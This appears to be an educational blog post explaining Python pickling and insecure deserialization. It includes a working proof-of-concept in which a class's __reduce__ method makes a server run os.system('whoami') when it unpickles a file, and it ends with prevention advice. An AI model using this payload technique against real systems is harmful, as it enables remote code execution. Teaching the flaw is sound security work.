Using Pythons Pickling to Explain Insecure Deserialization
Before I go on rambling about what insecure deserialization is, I will explain what serialization and deserialization is.
Serialization is the process of converting an object into a stream of bytes to store the object to memory, a database, or a file. Do not confuse object with variable. Think of it like this — variable can store only one data type at a time whereas an object can store multiple. Serialization goes by different names in different languages, it is serialization for java, pickling for python and marshalling for Perl and some other languages.
Deserialization is the process of converting serialized data in bytes to readable format.
Allow me to demonstrate.
We will be using a library called pickle in python. If you have a terminal up and running, type the following commands.
python3
This will open a Python3 interactive session in the terminal. Now import the pickle library.
>>>import pickle
Next, define an object.
>>>example = { "name" : "Shibin" , "position" : "sec engineer" }
Now that we have defined our object we will pickle (serialize) it. There are a lot of functions in the pickle library whose documentation can be found here. But here, we will be using only two functions from that library — dumps() and loads().
pickle.dumps() is used to pickle (serialize) the data and it takes a variable, function or class to be pickled as its argument.
pickle.loads() is used to unpickle (deserialize) the data and takes a variable containing byte stream as a valid arguement.
Let’s pickle the object that we have.
>>>pickle.dumps(example)
This will pickle the data and the output will look somewhat like this:
b'\x80\x03}q\x00(X\x04\x00\x00\x00nameq\x01X\x06\x00\x00\x00Shibinq\x02X\x08\x00\x00\x00positionq\x03X\x0c\x00\x00\x00sec engineerq\x04u.'
Now to use loads(),
>>>pickle.loads(b'\x80\x03}q\x00(X\x04\x00\x00\x00nameq\x01X\x06\x00\x00\x00Shibinq\x02X\x08\x00\x00\x00positionq\x03X\x0c\x00\x00\x00sec engineerq\x04u.')
which will give us the data back.
{'name': 'Shibin', 'position': 'sec engineer'}
Now you might be wondering how this can potentially be a threat to be listed in OWASP Top 10 vulnerabilities. Insecure deserialization is when an app deserializes the data that it gets without any kind of validation, or even the authenticity of the data.
Again, allow me to demonstrate.
Consider that there is a (shady) Python app which has both server side(server.py) and client side(client.py). The client will pickle some data and send it over to the server and the server will unpickle the data and display it.
The script for client.py is:
import os
import pickle
def serialize_exploit():
name = {"name":"shibin","pos":"sec Engineer"}
f = open("demo.pickle","wb")
safecode = pickle.dump(name,f) ######
return safecode
if __name__ == '__main__':
safecode = serialize_exploit()
(Hmm. Shady app indeed, why does it import the os library!?!?!) The script has a function serialize_exploit() which defines an object called name. Then a file called demo.pickle is opened for writing in binary format after which dump() (not dumps()) is used to pickle the object name and write into the file.
Run the client with python3.
>>>python3 client.py
The pickled data is written into the file demo.pickle. Printing the file using cat will show:
>>>?}q(XnameqXshibinqXposqX
sec Engineerqu.%
The script for server.py is:
import os
import pickle
def insecure_deserialization():
f = open("demo.pickle","rb")
na = pickle.load(f)
return na
if __name__ == '__main__':
print(insecure_deserialization())
This script has a function called insecure_deserialization()
which opens the file demo.pickle to read the data in binary format. The function load() (not loads()) will read the data and unpickle. This data is then printed.
Run the server with python3.
>>>python3 server.py
It will print the data
>>>{"name":"shibin","pos":"sec Engineer"}
So in short, the client will pickle (serialise) some data and the server, without even validating the data it got, unpickles (deserializes) the data. Now begins the interesting part.
Let us focus on client.py. Since there is no validation whatsoever, it will pickle any data thrown at it. So lets try to modify the script client.py as shown below
import os
import pickle
class ImVulnerable(): ###
def __reduce__(self): ###
return(os.system,('whoami',)) ###
def serialize_exploit():
name = {"name":"shibin","pos":"sec Engineer"}
f = open("demo.pickle","wb")
safecode = pickle.dump(ImVulnerable(),f) ###
return safecode
if __name__ == '__main__':
safecode = serialize_exploit()
The changes in lines are highlighted with hash symbols(###). We define a class ImVulnerable() and inside it is a function which returns a linux kernel command using the os library of python. This class is then passed as an argument to dump() which then, as you are familiar by now, pickles it and writes it into the file demo.pickle. The content in the file demo.pickle is now:
?cos
system
qXwhoamiq?qRq.%
Note that we have not edited the file server.py till now. Now when I try to run the server file, it will read the demo.pickle file and then unpickles the data. This will reveal the linux kernel command instead of a text to print. The command ‘whoami’ is executed in the server script!!!!!!!
If this was really a server and a client,
REMOTE CODE EXECUTION, JUST LIKE THAT!!!!!!!!!!!!
How to prevent this:
- DO NOT accept serialized data from untrusted sources.
- Run deserialization code with limited access permission.
- Validate user input. Cyber Security 101 — Never trust user input!
Hope this article was straightforward. :)